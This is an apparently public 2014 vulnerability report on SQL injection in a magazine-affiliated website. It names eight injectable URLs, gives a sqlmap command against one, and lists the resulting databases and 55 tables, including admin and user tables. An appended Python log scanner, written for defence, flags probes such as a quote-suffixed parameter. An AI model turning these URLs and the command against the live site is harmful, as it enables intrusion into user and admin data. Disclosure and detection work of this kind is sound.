2014-02-13: Details reported to the vendor; awaiting vendor response
2014-02-23: The vendor chose to ignore the vulnerability; details disclosed to the public
Injection.
1. Injection points
http://decoclub.ellechina.com/calendar_cont.php?calid=12
http://decoclub.ellechina.com/detailopus.php?leftlogin=islogin&uid=34
http://decoclub.ellechina.com/detailopus_cont.php?id=66&uid=34
http://decoclub.ellechina.com/detailopus_msg.php?uid=34
http://decoclub.ellechina.com/detailopus_pic.php?uid=34
http://decoclub.ellechina.com/masterlarge.php?id=7
http://decoclub.ellechina.com/msg_act.php?uid=34
http://decoclub.ellechina.com/opuslist_cont.php?id=33/2
2. Pick one to test
http://decoclub.ellechina.com/calendar_cont.php?calid=12 (GET)
sqlmap.py -u "http://decoclub.ellechina.com/calendar_cont.php?calid=12" --dbms "mysql" --dbs
Database
available databases [2]:
[*] information_schema
[*] vendor2
Tables
Database: vendor2
[55 tables]
+--------------------------------------+
| deco2013_admin                       |
| deco2013_user                        |
| deco2013_vote                        |
| ellechina_femina_admin               |
| ellechina_femina_award               |
| ellechina_femina_control             |
| ellechina_femina_log                 |
| ellechina_femina_member              |
| ellechina_femina_mode                |
| ellechina_femina_msg                 |
| ellechina_femina_pointlog            |
| ellechina_femina_staraward           |
| ellechina_femina_vote                |
| elleshop_admin                       |
| elleshop_end                         |
| elleshop_final                       |
| elleshop_player                      |
| elleshop_product                     |
| esa2011_admin                        |
| esa2011_player                       |
| esa2011_player_com                   |
| esa2011_player_vot                   |
| esa2011_user                         |
| good8_activity_decodesigner_admin    |
| good8_activity_decodesigner_calendar |
| good8_activity_decodesigner_control  |
| good8_activity_decodesigner_dsjt     |
| good8_activity_decodesigner_dsjtcont |
| good8_activity_decodesigner_hjsign   |
| good8_activity_decodesigner_ltype    |
| good8_activity_decodesigner_member   |
| good8_activity_decodesigner_minitype |
| good8_activity_decodesigner_mode     |
| good8_activity_decodesigner_msg      |
| good8_activity_decodesigner_uppic    |
| good8_activity_decodesigner_vote     |
| grandtour2011_admin                  |
| grandtour2011_model                  |
| grandtour2011_model_x_votes          |
| grandtour2011_open_car               |
| grandtour2011_users                  |
| huayi_admin                          |
| huayi_img_auction                    |
| huayi_p_auction                      |
| huayi_u_auction                      |
| huayi_userinfo                       |
| itgirl_admin                         |
| itgirl_control                       |
| itgirl_isopen                        |
| itgirl_liuyan                        |
| itgirl_player                        |
| itgirl_subject                       |
| itgirl_user                          |
| itgirl_vote                          |
| itgirl_zone                          |
+--------------------------------------+
... see details
Filter the input~
Severity: No impact (ignored by vendor)
Ignored at: 2014-02-23 15:06
None yet
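Added example, not part of the original report: a log check that goes with the filtering fix suggested above. It flags requests where the identifier parameters seen in the report's URLs (calid, uid, id) carry anything other than a plain integer. The combined-log layout, IP addresses, timestamps and response sizes are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Identifier parameters taken from the URLs in the report.
NUMERIC_PARAMS = {"calid", "uid", "id"}
INT_RE = re.compile(r"[0-9]{1,10}")
# Request line of a combined-format access log entry (assumed log layout).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')


def check_target(target):
    """Return (param, decoded value) pairs that are not plain integers."""
    bad = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not INT_RE.fullmatch(value):
            bad.append((name, value))
    return bad


def scan(lines):
    """Return (line number, path, param, value) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a request line in the assumed layout
        target = match.group("target")
        for name, value in check_target(target):
            findings.append((lineno, urlsplit(target).path, name, value))
    return findings


# Constructed sample entries (documentation IP range, invented timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Feb/2014:10:00:01 +0800] "GET /calendar_cont.php?calid=12 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Feb/2014:10:00:07 +0800] "GET /opuslist_cont.php?id=33/2 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [13/Feb/2014:10:02:15 +0800] "GET /calendar_cont.php?calid=12%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [13/Feb/2014:10:02:19 +0800] "GET /detailopus.php?leftlogin=islogin&uid=34 HTTP/1.1" 200 7301',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the server side, the same strict integer check belongs in front of a parameterized query rather than a concatenated SQL string.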